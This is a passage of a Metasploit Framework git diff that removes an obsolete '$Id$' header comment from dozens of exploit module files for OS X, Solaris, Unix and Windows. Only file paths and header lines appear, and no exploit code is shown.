a/modules/exploits/osx/misc/ufo_ai.rb +++ b/modules/exploits/osx/misc/ufo_ai.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb index 5d071eaf46..7945ab9da9 100644 --- a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb +++ b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/osx/samba/lsa_transnames_heap.rb b/modules/exploits/osx/samba/lsa_transnames_heap.rb index a4e37fd3bc..bb20ac9426 100644 --- a/modules/exploits/osx/samba/lsa_transnames_heap.rb +++ b/modules/exploits/osx/samba/lsa_transnames_heap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/osx/samba/trans2open.rb b/modules/exploits/osx/samba/trans2open.rb index f486343cfd..fc8adba31a 100644 --- a/modules/exploits/osx/samba/trans2open.rb +++ b/modules/exploits/osx/samba/trans2open.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/solaris/dtspcd/heap_noir.rb b/modules/exploits/solaris/dtspcd/heap_noir.rb index b0e5d8738a..9a959cc17f 100644 --- a/modules/exploits/solaris/dtspcd/heap_noir.rb +++ b/modules/exploits/solaris/dtspcd/heap_noir.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/solaris/lpd/sendmail_exec.rb b/modules/exploits/solaris/lpd/sendmail_exec.rb index faa54e71f8..e2b425e09f 100644 --- a/modules/exploits/solaris/lpd/sendmail_exec.rb +++ b/modules/exploits/solaris/lpd/sendmail_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/solaris/samba/lsa_transnames_heap.rb b/modules/exploits/solaris/samba/lsa_transnames_heap.rb index 18a8835028..9357a9f24a 100644 --- a/modules/exploits/solaris/samba/lsa_transnames_heap.rb +++ b/modules/exploits/solaris/samba/lsa_transnames_heap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/solaris/samba/trans2open.rb b/modules/exploits/solaris/samba/trans2open.rb index 15cfc28d01..ed54fa6bf4 100644 --- a/modules/exploits/solaris/samba/trans2open.rb +++ b/modules/exploits/solaris/samba/trans2open.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb index 81216f0746..9d61925df7 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/solaris/sunrpc/sadmind_exec.rb b/modules/exploits/solaris/sunrpc/sadmind_exec.rb index 3d688f8bc5..c281359ea2 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_exec.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb index b72909e874..94e99be499 100644 --- a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb +++ b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/solaris/telnet/fuser.rb b/modules/exploits/solaris/telnet/fuser.rb index 284fe48e88..cfceb47eea 100644 --- a/modules/exploits/solaris/telnet/fuser.rb +++ b/modules/exploits/solaris/telnet/fuser.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/solaris/telnet/ttyprompt.rb b/modules/exploits/solaris/telnet/ttyprompt.rb index 4fde4b7879..0ab86110de 100644 --- a/modules/exploits/solaris/telnet/ttyprompt.rb +++ b/modules/exploits/solaris/telnet/ttyprompt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb index 8d5c1fed92..e34fc33b86 100644 --- a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb +++ b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index 06b7215d06..b2e9e896a5 100644 --- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb index 370d9c7ec2..91d447121e 100644 --- a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb +++ b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/http/lifesize_room.rb b/modules/exploits/unix/http/lifesize_room.rb index 711f214f9b..17317cbd1b 100644 --- a/modules/exploits/unix/http/lifesize_room.rb +++ b/modules/exploits/unix/http/lifesize_room.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb index 4024049f1e..0632f252cd 100644 --- a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb +++ b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/misc/distcc_exec.rb b/modules/exploits/unix/misc/distcc_exec.rb index 84f54c307a..d32bccc6fa 100644 --- a/modules/exploits/unix/misc/distcc_exec.rb +++ b/modules/exploits/unix/misc/distcc_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/misc/spamassassin_exec.rb b/modules/exploits/unix/misc/spamassassin_exec.rb index 2819153a46..a8dc8776f4 100644 --- a/modules/exploits/unix/misc/spamassassin_exec.rb +++ b/modules/exploits/unix/misc/spamassassin_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/misc/zabbix_agent_exec.rb b/modules/exploits/unix/misc/zabbix_agent_exec.rb index 6c1bf94a97..855720d062 100644 --- a/modules/exploits/unix/misc/zabbix_agent_exec.rb +++ b/modules/exploits/unix/misc/zabbix_agent_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb index 750b6aa16c..b18a8aac42 100644 --- a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb +++ b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/smtp/exim4_string_format.rb b/modules/exploits/unix/smtp/exim4_string_format.rb index 91ed48155e..75bb11af8e 100644 --- a/modules/exploits/unix/smtp/exim4_string_format.rb +++ b/modules/exploits/unix/smtp/exim4_string_format.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/awstats_configdir_exec.rb b/modules/exploits/unix/webapp/awstats_configdir_exec.rb index ddd25efe25..c9661b76d7 100644 --- a/modules/exploits/unix/webapp/awstats_configdir_exec.rb +++ b/modules/exploits/unix/webapp/awstats_configdir_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/awstats_migrate_exec.rb b/modules/exploits/unix/webapp/awstats_migrate_exec.rb index 0dee3ecd41..5905a6be22 100644 --- a/modules/exploits/unix/webapp/awstats_migrate_exec.rb +++ b/modules/exploits/unix/webapp/awstats_migrate_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/awstatstotals_multisort.rb b/modules/exploits/unix/webapp/awstatstotals_multisort.rb index 4b4bf0238f..620ec2cad9 100644 --- a/modules/exploits/unix/webapp/awstatstotals_multisort.rb +++ b/modules/exploits/unix/webapp/awstatstotals_multisort.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/barracuda_img_exec.rb b/modules/exploits/unix/webapp/barracuda_img_exec.rb index f0f2f8c59d..0881273285 100644 --- a/modules/exploits/unix/webapp/barracuda_img_exec.rb +++ b/modules/exploits/unix/webapp/barracuda_img_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/base_qry_common.rb b/modules/exploits/unix/webapp/base_qry_common.rb index 4fa4e9d1b9..1cb1011181 100644 --- a/modules/exploits/unix/webapp/base_qry_common.rb +++ b/modules/exploits/unix/webapp/base_qry_common.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb index 842e744e8d..7831e6c378 100644 --- a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb +++ b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb index a3ddb0bc8a..cb67177938 100644 --- a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb +++ b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb b/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb index d0fe3a3f62..dd26ead4cf 100644 --- a/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb +++ b/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/coppermine_piceditor.rb b/modules/exploits/unix/webapp/coppermine_piceditor.rb index e31539dc52..85e6be4dbe 100644 --- a/modules/exploits/unix/webapp/coppermine_piceditor.rb +++ b/modules/exploits/unix/webapp/coppermine_piceditor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/dogfood_spell_exec.rb b/modules/exploits/unix/webapp/dogfood_spell_exec.rb index abe79ede7d..2af2a6f88d 100644 --- a/modules/exploits/unix/webapp/dogfood_spell_exec.rb +++ b/modules/exploits/unix/webapp/dogfood_spell_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/generic_exec.rb b/modules/exploits/unix/webapp/generic_exec.rb index a6b4d7ac29..f7e3e287c0 100644 --- a/modules/exploits/unix/webapp/generic_exec.rb +++ b/modules/exploits/unix/webapp/generic_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb index 70ccbff297..8fd854e2f3 100644 --- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb +++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb index 51a0a1d8f6..8fed93c967 100644 --- a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb +++ b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/joomla_tinybrowser.rb b/modules/exploits/unix/webapp/joomla_tinybrowser.rb index 309e0c39d0..37754c5ff5 100644 --- a/modules/exploits/unix/webapp/joomla_tinybrowser.rb +++ b/modules/exploits/unix/webapp/joomla_tinybrowser.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/mambo_cache_lite.rb b/modules/exploits/unix/webapp/mambo_cache_lite.rb index 956d414116..55a926d379 100644 --- a/modules/exploits/unix/webapp/mambo_cache_lite.rb +++ b/modules/exploits/unix/webapp/mambo_cache_lite.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/mitel_awc_exec.rb b/modules/exploits/unix/webapp/mitel_awc_exec.rb index c32f16a4d6..62d6efab31 100644 --- a/modules/exploits/unix/webapp/mitel_awc_exec.rb +++ b/modules/exploits/unix/webapp/mitel_awc_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/mybb_backdoor.rb b/modules/exploits/unix/webapp/mybb_backdoor.rb index 68f1769e5d..9b46cab27a 100644 --- a/modules/exploits/unix/webapp/mybb_backdoor.rb +++ b/modules/exploits/unix/webapp/mybb_backdoor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb index 302b664d5d..e841b59303 100644 --- a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb +++ b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb index 157f23d70f..4e34c9304f 100644 --- a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb +++ b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/openx_banner_edit.rb b/modules/exploits/unix/webapp/openx_banner_edit.rb index 445a8fcbe6..f00bb3a598 100644 --- a/modules/exploits/unix/webapp/openx_banner_edit.rb +++ b/modules/exploits/unix/webapp/openx_banner_edit.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb index 52cd4fa554..037e49db01 100644 --- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb +++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/oscommerce_filemanager.rb b/modules/exploits/unix/webapp/oscommerce_filemanager.rb index 6980a05d00..7da3c173df 100644 --- a/modules/exploits/unix/webapp/oscommerce_filemanager.rb +++ b/modules/exploits/unix/webapp/oscommerce_filemanager.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/pajax_remote_exec.rb b/modules/exploits/unix/webapp/pajax_remote_exec.rb index f3f7e7fca5..d996342cbe 100644 --- a/modules/exploits/unix/webapp/pajax_remote_exec.rb +++ b/modules/exploits/unix/webapp/pajax_remote_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/php_eval.rb b/modules/exploits/unix/webapp/php_eval.rb index bb75c80e6c..5f65c9fe86 100644 --- a/modules/exploits/unix/webapp/php_eval.rb +++ b/modules/exploits/unix/webapp/php_eval.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/php_vbulletin_template.rb b/modules/exploits/unix/webapp/php_vbulletin_template.rb index d8985d25e4..7ff5ef42ed 100644 --- a/modules/exploits/unix/webapp/php_vbulletin_template.rb +++ b/modules/exploits/unix/webapp/php_vbulletin_template.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/php_wordpress_lastpost.rb b/modules/exploits/unix/webapp/php_wordpress_lastpost.rb index 3812aefaba..5d6a93f30c 100644 --- a/modules/exploits/unix/webapp/php_wordpress_lastpost.rb +++ b/modules/exploits/unix/webapp/php_wordpress_lastpost.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb index eab6532dff..fc374a6fb8 100644 --- a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb +++ b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/phpbb_highlight.rb b/modules/exploits/unix/webapp/phpbb_highlight.rb index 39252dba39..077c6287f3 100644 --- a/modules/exploits/unix/webapp/phpbb_highlight.rb +++ b/modules/exploits/unix/webapp/phpbb_highlight.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb index fc5bc113a5..0a88755015 100644 --- a/modules/exploits/unix/webapp/phpmyadmin_config.rb +++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb b/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb index 8f86aefe2a..2d96d5f400 100644 --- a/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb +++ b/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/redmine_scm_exec.rb b/modules/exploits/unix/webapp/redmine_scm_exec.rb index bbf6c12be1..bf6cc7faab 100644 --- a/modules/exploits/unix/webapp/redmine_scm_exec.rb +++ b/modules/exploits/unix/webapp/redmine_scm_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index 25159683ff..bd3326d2df 100644 --- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb b/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb index 23389e3f7c..90934f39e6 100644 --- a/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb +++ b/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb index 05d9b5c4ba..6e3fbd1dad 100644 --- a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb index c169b843fe..71810d242f 100644 --- a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb index 23ea4e04d5..4872b15483 100644 --- a/modules/exploits/unix/webapp/trixbox_langchoice.rb +++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/twiki_history.rb b/modules/exploits/unix/webapp/twiki_history.rb index 6f57d9c253..d38171ef53 100644 --- a/modules/exploits/unix/webapp/twiki_history.rb +++ b/modules/exploits/unix/webapp/twiki_history.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/unix/webapp/twiki_search.rb b/modules/exploits/unix/webapp/twiki_search.rb index 076195f93b..c6d60bf4cb 100644 --- a/modules/exploits/unix/webapp/twiki_search.rb +++ b/modules/exploits/unix/webapp/twiki_search.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb index 2e0bd31649..95d53b3430 100644 --- a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb +++ b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/antivirus/ams_xfr.rb b/modules/exploits/windows/antivirus/ams_xfr.rb index be629648df..42683c28e5 100644 --- a/modules/exploits/windows/antivirus/ams_xfr.rb +++ b/modules/exploits/windows/antivirus/ams_xfr.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/antivirus/symantec_iao.rb b/modules/exploits/windows/antivirus/symantec_iao.rb index 324833477a..1caf46c418 100644 --- a/modules/exploits/windows/antivirus/symantec_iao.rb +++ b/modules/exploits/windows/antivirus/symantec_iao.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/antivirus/symantec_rtvscan.rb b/modules/exploits/windows/antivirus/symantec_rtvscan.rb index 06b6fb6a8a..bd2a799e40 100644 --- a/modules/exploits/windows/antivirus/symantec_rtvscan.rb +++ b/modules/exploits/windows/antivirus/symantec_rtvscan.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb index b754f695e8..d233e539c9 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb index ebf96d0e2e..918c245518 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb index d40d5ad566..9a54108e21 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/arkeia/type77.rb b/modules/exploits/windows/arkeia/type77.rb index 0baffff721..b7409de448 100644 --- a/modules/exploits/windows/arkeia/type77.rb +++ b/modules/exploits/windows/arkeia/type77.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/backdoor/energizer_duo_payload.rb b/modules/exploits/windows/backdoor/energizer_duo_payload.rb index ef13cb021e..313dff70eb 100644 --- 